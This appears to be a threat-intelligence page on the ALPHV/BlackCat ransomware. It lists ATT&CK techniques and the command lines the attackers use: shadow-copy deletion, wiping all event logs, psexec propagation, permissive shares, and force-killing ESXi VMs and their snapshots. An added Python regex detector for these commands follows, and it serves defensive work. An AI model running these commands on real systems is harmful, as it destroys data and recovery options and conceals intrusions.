TTPs
- T1003.004 - OS Credential Dumping: LSA Secrets
- T1005 - Data from Local System
- T1007 - System Service Discovery
- T1021.001 - Remote Desktop Protocol (RDP)
- T1021.002 - SMB/Windows Admin Shares
- T1027 - Obfuscated Files or Information
- T1027.002 - Obfuscated Files or Information: Software Packing
- T1047 - Windows Management Instrumentation
- T1049 - System Network Connections Discovery
- T1053.003 - Command and Scripting Interpreter: Windows Command Shell
- T1057 - Process Discovery
- T1059 - Command and Scripting Interpreter
- T1078 - Valid Accounts
- T1082 - System Information Discovery
- T1083 - File and Directory Discovery
- T1090.003 - Multi-hop Proxy
- T1105 - Ingress Tool Transfer
- T1112 - Modify Registry
- T1129 - Shared Modules
- T1140 - Deobfuscate/Decode Files or Information
- T1202 - Indirect Command Execution
- T1218.003 - Signed Binary Proxy Execution: CMSTP
- T1485 - Data Destruction
- T1486 - Data Encrypted for Impact
- T1489 - Service Stop
- T1490 - Inhibit System Recovery
- T1498 - Network Denial of Service
- T1499 - Endpoint Denial of Service
- T1531 - Account Access Removal
- T1543.003 - Create or Modify System Process: Windows Service
- T1550.002 - Use Alternate Authentication Material: Pass the Hash
- T1552 - Unsecured Credentials
- T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
- T1560 - Archive Collected Data
- T1562.001 - Impair Defenses: Disable or Modify Tools
- T1567.002 - Exfiltration to Cloud Storage
- T1569.002 - System Services: Service Execution
- T1570 - Lateral Tool Transfer
- Suspicious SMB traffic
- 'vssadmin' shadow copy deletions
- Editing or disabling recovery mode using 'bcdedit.exe'
- Propagation via 'psexec'
- Use of anti-forensics tools like fileshredder
- Collection of the machine UUID via WMIC commands
- The universally unique identifier (UUID) is later used, together with the token, to identify the victim in a Tor website hosted by the malicious actors.
- Delete volume shadow copies.
- Increase the number of simultaneous network requests the Server service can handle (MaxMpxCt).
- Stop the IIS service using iisreset.exe, a well-known tool for managing IIS services.
- Execute the arp command to display the current ARP (Address Resolution Protocol) entries.
- Execute fsutil to allow the evaluation of both remote and local symlinks.
- Clear all event logs via wevtutil.exe.
cmd /c wmic csproduct get UUID
vssadmin.exe delete shadows /all /quiet
powershell.exe -nop -exec bypass -EncodedCommand LgBcAHMAcAByAGUAYQBkAC4AYgBhAHQAIABtAGsAcwBoAGEAcgBlACAAUgBFAEEARAA=
icacls c:\windows\debug\app /grant "Authenticated Users":(OI)(CI)F /T
net share app=c:\windows\debug\app /grant:everyone,READ
fsutil behavior set SymlinkEvaluation R2L:1
fsutil behavior set SymlinkEvaluation R2R:1
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
psexec.exe -accepteula \\<TARGET_HOST> -u <USERNAME> -p <PASSWORD> -s -d -f -c <ALPHV_EXECUTABLE> [FLAGS] [OPTIONS] --access-token <ACCESS_TOKEN> [SUBCOMMAND]
arp -a
%SYSTEM32%\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
/c \\DOMAIN.LOCAL\netlogon\locker.exe --access-token CODE
gpupdate /force
esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list | awk -F "\"*,\"*" '{system("esxcli vm process kill --type=force --world-id="$1)}'
for i in `vim-cmd vmsvc/getallvms| awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i & done
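As an added example that is not part of the original page, the following Python detector matches process-creation command lines against the Windows commands listed above and decodes the PowerShell -EncodedCommand payload for the analyst; the event records it runs over are constructed samples, and the rule names are my own labels.

```python
import base64
import re

# Command-line patterns for the ALPHV/BlackCat pre-encryption commands listed above.
# Rule name (my own label) -> compiled regex over the process creation command line.
RULES = {
    "shadow_copy_deletion": re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
    "event_log_clearing": re.compile(r"\bwevtutil(?:\.exe)?\s+cl\b", re.I),
    "symlink_evaluation": re.compile(r"\bfsutil\s+behavior\s+set\s+SymlinkEvaluation\s+R2[LR]:1\b", re.I),
    "maxmpxct_registry": re.compile(r"\breg(?:\.exe)?\s+add\b.*LanmanServer\\Parameters\b.*\bMaxMpxCt\b", re.I),
    "uuid_collection": re.compile(r"\bwmic(?:\.exe)?\s+csproduct\s+get\s+uuid\b", re.I),
    "iis_stop": re.compile(r"\biisreset(?:\.exe)?\b", re.I),
    "psexec_service_copy": re.compile(r"\bpsexec(?:\.exe)?\b(?=.*\s-s\b)(?=.*\s-c\b)", re.I),
}
# -EncodedCommand (and its short forms) followed by a base64 blob.
ENCODED_PS = re.compile(r"\bpowershell(?:\.exe)?\b.*?-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(b64: str) -> str:
    """PowerShell -EncodedCommand carries UTF-16LE text; decode it so the analyst can read it."""
    return base64.b64decode(b64).decode("utf-16-le")


def classify(command_line: str) -> dict:
    """Return {rule_name: detail} for every rule the command line triggers."""
    hits = {}
    for name, pattern in RULES.items():
        m = pattern.search(command_line)
        if m:
            hits[name] = m.group(0)
    m = ENCODED_PS.search(command_line)
    if m:
        try:
            hits["encoded_powershell"] = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            hits["encoded_powershell"] = "<undecodable payload>"
    return hits


def scan(events: list) -> list:
    """events: (host, command_line) tuples; returns (host, rule_name, detail) alerts."""
    return [(host, rule, detail) for host, cmd in events for rule, detail in classify(cmd).items()]


# Constructed sample process-creation events; the command lines are the ones listed on this page.
SAMPLE_EVENTS = [
    ("WS01", "cmd /c wmic csproduct get UUID"),
    ("WS01", "vssadmin.exe delete shadows /all /quiet"),
    ("WS01", "powershell.exe -nop -exec bypass -EncodedCommand LgBcAHMAcAByAGUAYQBkAC4AYgBhAHQAIABtAGsAcwBoAGEAcgBlACAAUgBFAEEARAA="),
    ("SRV02", "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"),
    ("SRV02", 'for /F "tokens=*" %1 in (\'wevtutil.exe el\') DO wevtutil.exe cl "%1"'),
    ("SRV02", "C:\\Windows\\System32\\svchost.exe -k netsvcs"),  # benign, must not alert
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```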